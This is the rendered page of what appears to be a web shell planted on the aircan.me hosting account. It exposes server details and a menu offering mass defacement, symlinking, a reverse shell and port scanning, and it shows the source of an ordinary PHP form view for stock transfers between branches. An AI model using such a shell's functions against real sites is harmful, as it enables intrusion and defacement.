Tul xxx Tul
User / IP
:
216.73.216.217
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
vendefacil
/
views
/
traslados
/
Viewing: index.php
<?php include_once 'views/templates/header.php'; ?> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center mb-3"> <h5 class="card-title">Nuevo Traslado</h5> <hr> </div> <form id="formTraslado"> <div class="row mb-3"> <div class="col-md-6"> <label for="sucursalDestino" class="form-label"> <i class="fa fa-building"></i> Sucursal Destino </label> <select class="form-select" id="sucursalDestino" name="sucursalDestino" required> <option value="">Seleccione Sucursal</option> <?php foreach ($data['sucursales'] as $sucursal) { ?> <option value="<?= $sucursal['id']; ?>"><?= $sucursal['nombre']; ?></option> <?php } ?> </select> </div> <div class="col-md-6"> <label for="notaEnvio" class="form-label"> <i class="fa fa-sticky-note"></i> Nota del Envío </label> <textarea class="form-control" id="notaEnvio" name="notaEnvio" rows="2" placeholder="Ingrese indicaciones u observaciones..."></textarea> </div> </div> <div class="row mb-3"> <div class="col-md-8"> <div class="input-group"> <input type="text" class="form-control" id="buscarProducto" disabled name="buscarProducto" placeholder="Buscar Producto"> <button class="btn btn-primary" data-bs-toggle="modal" data-bs-target="#modalProducto" type="button" id="btnAgregarProducto"> <i class="fa fa-search"></i> </button> <a class="btn btn-info text-white" href="<?= BASE_URL . 'traslados/enviados'; ?>" id="btnHistorial"> <i class="fa fa-history"></i> Historial </a> </div> </div> </div> <div class="table-responsive mb-3"> <table class="table table-bordered align-middle" id="tablaCarrito"> <thead class="table-light"> <tr> <th>Producto</th> <th>Cantidad</th> <th>Acción</th> </tr> </thead> <tbody> <tr> <td colspan="3" class="text-center text-muted">CARRITO VACÍO</td> </tr> </tbody> </table> </div> <div class="text-end"> <button type="submit" id="btnCompletarTraslado" class="btn btn-primary px-4"> <i class="fa fa-check-circle"></i> Completar Traslado </button> </div> </form> </div> </div> <?php include_once 'views/templates/footer.php'; ?>
Coded With 💗 by
0x6ick